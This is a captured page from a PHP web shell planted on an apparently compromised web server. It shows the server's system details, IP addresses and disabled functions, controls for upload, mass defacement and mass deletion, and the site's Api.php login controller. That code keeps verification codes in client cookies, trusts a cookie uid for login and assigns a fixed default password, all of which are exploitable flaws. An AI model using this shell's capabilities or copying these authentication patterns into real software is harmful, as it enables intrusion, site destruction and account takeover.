shell bypass 403

GrazzMean Shell

: /www/wwwroot/jc.chatgptzh.com/app/index/controller/ [ drwxr-xr-x ]
Uname: Linux yisu-647059427c03a 3.10.0-862.14.4.el7.x86_64 #1 SMP Wed Sep 26 15:12:11 UTC 2018 x86_64
Software: nginx/1.22.1
PHP version: 7.3.31 [ PHP INFO ] PHP os: Linux
Server Ip: 103.146.158.90
Your Ip: 216.73.216.141
User: www (1000) | Group: www (1000)
Safe Mode: OFF
Disable Function:
passthru,exec,system,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv
upload mass deface mass delete console

name : Api.php 
<?php
// +----------------------------------------------------------------------
// | Copyright (c) 2020-08-10 http://myucms.com All rights reserved.
// +----------------------------------------------------------------------
// | Author: 梦雨 <50361804@qq.com>
// +----------------------------------------------------------------------
namespace app\index\controller;
use think\Controller;
use think\Db;
open_ts(); 
class Api extends Controller
{
    //代码更新
    public function codeUpdate()
    {
        admin();
        if (_post()) {
            $data =  input('post.');
            $data['times'] =  time();
            $data['content'] =  addslashes(preg(input('content')));
            if (Db::name(input('model'))->where(array('id' => input('id')))->update($data)) {
                $this->success('更新成功');
            } else {
                $this->error('更新失败');
            }
        } 
    }
    //接收验证码
    public function code()
    {
        if (cookie('uid')==user('uid')) {
            $this->success('已登录');
        } 
        $code = mt_rand(100000, 999999);
        if (!filter_var(get('mail'), FILTER_VALIDATE_EMAIL)){
            $this->error('邮箱不正确');
        }
        if (cookie('code')!=false) {
            $this->error('验证码未过期');
        }   
        if (send_mail(get('mail'), '【'.set('title').'】账号登录验证', '来自【'.set('title').'】的账号登录,验证码'.$code.'五分钟内有效')) {
            cookie('code', $code,300);
            session('mail', get('mail'));
            $this->success('发送成功');
        } else {
            $this->error('发送失败');
        }
    }
    //邮箱直接登录
    public function login()
    {
        if (cookie('uid')==user('uid')) {
            $this->success('已登录');
        } 
        if (_post()) {
            //查询是否存在用户
            if (!filter_var(get('mail'), FILTER_VALIDATE_EMAIL)){
                $this->error('邮箱不正确');
            }
            if (cookie('code')!=get('code')||session('mail')!=get('mail')){
                $this->error('验证码不正确');
            }
            $c = Db::name('user')->where(array('mail' => get('mail')))->find();
            if ($c['mail'] == strtolower(get('mail'))) {
                // 登录
                cookie('uid', $c['uid'],315360000);
                $this->success('登录成功');
            } else {
                // 注册
                $data['ip'] = $_SERVER["REMOTE_ADDR"];
                $data['mail'] = strtolower(get('mail'));
                $data['password'] = md5(123456);
                $data['time'] = time();
                $data['open'] = 1;
                $data['uid'] = p_id(64);
                $data['name'] = '用户'.mt_rand(100000, 9999999999999);
                $c_c = Db::name('user')->where(array('ip' => $_SERVER["REMOTE_ADDR"]))->count();
                if ($c_c >= 5) {
                    return json(array('code' => 0, 'msg' => '注册频繁'));
                }
                if ($id = Db::name('user')->where($data)->insert($data)) {
                    cookie('uid', $data['uid']);
                    return json(array('code' => 1, 'msg' => '注册成功'));
                } else {
                    return json(array('code' => 0, 'msg' => '注册失败'));
                }
            }
        }
    }
    //退出登录
    public function out()
    {
        session('userid', null);
        cookie('uid',null);
        return json(array('code' => 1, 'msg' => '退出成功'));
    }
    //收藏
    public function shoucang()
    {
        if (cookie('uid')!=user('uid')) {
            $this->error('请先登录');
        } 
        $c = Db::name('shoucang')->where(array('url' => get('data'),'uid' => user('id')))->count();
        if ($c>0) {
            if (Db::name('shoucang')->where(array('url' => get('data'),'uid' => user('id')))->delete()) {
                $this->success('取消收藏成功');
            } else {
                $this->error('取消收藏失败');
            }
        }
        $data['open'] = 1;
        $data['time'] = time();
        $data['url'] = get('data');
        $data['uid'] = user('id');
        $data['title'] = Query(http().$_SERVER["HTTP_HOST"].get('data'),'title','text');
        if ($id = Db::name('shoucang')->where($data)->insert($data)) {
            $this->success('收藏成功');
        } else {
            $this->error('收藏失败');
        }
    }
}
© 2026 GrazzMean